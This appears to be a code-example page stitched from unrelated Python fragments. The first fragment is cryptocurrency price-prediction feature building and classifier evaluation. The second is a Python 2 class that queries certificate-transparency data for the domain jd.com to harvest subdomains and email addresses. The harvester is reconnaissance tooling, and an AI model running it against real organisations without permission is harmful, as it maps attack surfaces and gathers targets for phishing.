        # Build resampled OHLCV and TA features
        ohlcv_3d = builder.periodic_ohlcv_resample(ohlcv, period=3, label=True)
        ohlcv_7d = builder.periodic_ohlcv_resample(ohlcv, period=7, label=True)
        ohlcv_30d = builder.periodic_ohlcv_resample(ohlcv,
                                                    period=30,
                                                    label=True)
        ta = builder.features_ta(ohlcv)
        ta_3d = builder.period_resampled_ta(ohlcv, period=3)
        ta_7d = builder.period_resampled_ta(ohlcv, period=7)
        ta_30d = builder.period_resampled_ta(ohlcv, period=30)

        # Build target percent variation
        close = ohlcv['close']
        target_pct = builder.target_price_variation(ohlcv['close'], periods=1)
        target_class = builder.target_discrete_price_variation(target_pct)
        target_binary = builder.target_binary_price_variation(target_pct)
        target_labels = builder.target_label(target_class,
                                             labels=['SELL', 'HOLD', 'BUY'])
        target_binary_labels = builder.target_label(target_binary,
                                                    labels=['SELL', 'BUY'])
        target_bin = builder.target_binned_price_variation(target_pct,
                                                           n_bins=3)
        target_bin_binary = builder.target_binned_price_variation(target_pct,
                                                                  n_bins=2)
        target_bin_labels = builder.target_label(
            target_bin, labels=['SELL', 'HOLD', 'BUY'])
        target_bin_binary_labels = builder.target_label(target_bin_binary,
                                                        labels=['SELL', 'BUY'])
        # Merge all the datasets
        dataframes = [
            ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm
        ]  #, social_pct]
        df = pd.concat(dataframes,
                       axis='columns',
                       verify_integrity=True,
                       sort=True,
                       join='inner')
        target = pd.concat([
            close, target_pct, target_class, target_binary, target_bin,
            target_bin_binary, target_labels, target_binary_labels,
            target_bin_labels, target_bin_binary_labels
        ],
                           axis=1)
        target.columns = [
            'close', 'pct', 'class', 'binary', 'bin', 'binary_bin', 'labels',
            'binary_labels', 'bin_labels', 'binary_bin_labels'
        ]
        target = target.loc[df.first_valid_index():df.last_valid_index()]
        # Save resulting dataset both in CSV and Excel format
        logger.info('Saving {}'.format(_sym))
        feature_groups = {
            'ohlcv': [c for c in ohlcv.columns],
            'ohlcv_3d': [c for c in ohlcv_3d.columns],
            'ohlcv_7d': [c for c in ohlcv_7d.columns],
            'ohlcv_30d': [c for c in ohlcv_30d.columns],
            'ta': [c for c in ta.columns],
            'ta_3d': [c for c in ta_3d.columns],
            'ta_7d': [c for c in ta_7d.columns],
            'ta_30d': [c for c in ta_30d.columns],
            'cm': [c for c in cm.columns],
            # 'social_pct': [c for c in social_pct.columns],
        }
        save_symbol_dataset(dest_index,
                            _sym,
                            df,
                            target=target,
                            feature_groups=feature_groups)
        logger.info('Saved {}'.format(_sym))
def main():
    index = load_dataset('all_merged', return_index=True)
    resultFile = './data/datasets/all_merged/estimators/randomforest_sfm_hyperparameters.json'
    hyperparameters = {}
    if not os.path.exists(resultFile):
        logger.error('no hyperparameters!')
    with open(resultFile, 'r') as f:
        hyperparameters = json.load(f)
    for _sym, data in index.items():
        if _sym not in hyperparameters or not os.path.exists(
                hyperparameters[_sym]['estimator']):
            logger.error('{} does not exist.'.format(_sym))
        else:
            features = pd.read_csv(data['csv'],
                                   sep=',',
                                   encoding='utf-8',
                                   index_col='Date',
                                   parse_dates=True)
            # Replace nan with infinity so that it can later be imputed to a finite value
            features = features.replace([np.inf, -np.inf], np.nan)
            #features = features[hyperparameters['feature_importances']]

            # Derive target classes from closing price
            target_pct = target_price_variation(features['close'])
            target = target_binned_price_variation(target_pct, n_bins=2)
            # target = target_discrete_price_variation(target_pct)

            # Split data in train and blind test set with 70:30 ratio,
            #  most ML models don't take sequentiality into account, but our pipeline
            #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
            X_train, X_test, y_train, y_test = train_test_split(
                features.values, target.values, shuffle=False, test_size=0.3)
            # Summarize distribution
            print("Training set: # Features {}, # Samples {}".format(
                X_train.shape[1], X_train.shape[0]))
            plot_class_distribution("Training set", _sym, y_train)
            print("Test set: # Features {}, # Samples {}".format(
                X_test.shape[1], X_test.shape[0]))
            plot_class_distribution("Test set", _sym, y_test)
            if not np.isfinite(X_train).all():
                logger.warning("Training x is not finite!")
            if not np.isfinite(y_train).all():
                logger.warning("Training y is not finite!")
            if not np.isfinite(X_test).all():
                logger.warning("Test x is not finite!")
            if not np.isfinite(y_test).all():
                logger.warning("Test y is not finite!")

            # Take the fitted ensemble with tuned hyperparameters
            clf = None
            with open(hyperparameters[_sym]['estimator'], 'rb') as f:
                clf = pickle.load(f)

            # Test ensemble's performance on training and test sets
            logger.info("Classification report on train set")
            predictions1 = clf.predict(X_train)
            train_report = classification_report(y_train,
                                                 predictions1,
                                                 output_dict=True)
            print(classification_report(y_train, predictions1))
            logger.info("Classification report on test set")
            predictions2 = clf.predict(X_test)
            test_report = classification_report(y_test,
                                                predictions2,
                                                output_dict=True)
            print(classification_report(y_test, predictions2))
            stats = {
                'score': accuracy_score(y_train, predictions1),
                'mse': mean_squared_error(y_train, predictions1),
                'test_score': accuracy_score(y_test, predictions2),
                'test_mse': mean_squared_error(y_test, predictions2),
                'train_report': train_report,
                'test_report': test_report,
            }
            print(stats)
            print("--- end ---")
def build_atsa_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]
        ta = _df[entry['features']['ta']]

        # Build the dataframe with base features
        ohlc = ohlcv[['open', 'high', 'low', 'close']]
        lagged_ohlc = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')
        # Add lagged features to the dataframe
        atsa_df = pd.concat([lagged_ohlc, ta],
                            axis='columns',
                            verify_integrity=True,
                            sort=True,
                            join='inner')

        # Drop the first 30 rows
        atsa_df = atsa_df[30:]

        # Save the dataframe
        atsa_df.to_csv('data/datasets/all_merged/csv/{}_atsa.csv'.format(
            _sym.lower()),
                       sep=',',
                       encoding='utf-8',
                       index=True,
                       index_label='Date')
        atsa_df.to_excel('data/datasets/all_merged/excel/{}_atsa.xlsx'.format(
            _sym.lower()),
                         index=True,
                         index_label='Date')
        # decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df)
        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_atsa.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_atsa.xlsx'.format(_sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'atsa': [c for c in atsa_df.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_atsa.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
Exemple #57
0
    def run(self):
        url = self.base_url.format(domain=self.domain)
        #print url
        try:
            self.resp = http_request_get(url).content
            if self.resp:
                self.subdomains = self.get_hostnames()
                self.email = self.get_email()
            for domain in self.subdomains:
                self.domain_name.append(domain)
        except Exception, e:
            logger.error("Error in {0}: {1}".format(
                __file__.split('/')[-1], e))
        finally:
            logger.info("{0} found {1} domains".format(self.engine_name,
                                                       len(self.domain_name)))
            return self.domain_name, self.smiliar_domain_name, self.email

    def get_hostnames(self):
        rawres = parser(self.resp, self.domain)
        return rawres.hostnames()

    def get_email(self):
        rawres = parser(self.resp, self.domain)
        return rawres.emails()


if __name__ == "__main__":
    x = CrtSearch("jd.com")
    print x.run()